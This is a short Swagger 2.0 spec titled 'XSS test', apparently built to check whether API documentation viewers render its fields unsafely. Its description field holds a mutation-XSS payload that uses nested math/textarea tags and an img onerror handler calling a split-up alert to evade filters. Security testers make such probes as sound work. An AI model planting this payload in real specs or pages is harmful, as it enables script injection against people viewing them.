swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6><textarea><a title="<img src onerror %09=top['ale'%2b'rt']()>">
 

                
  version: production
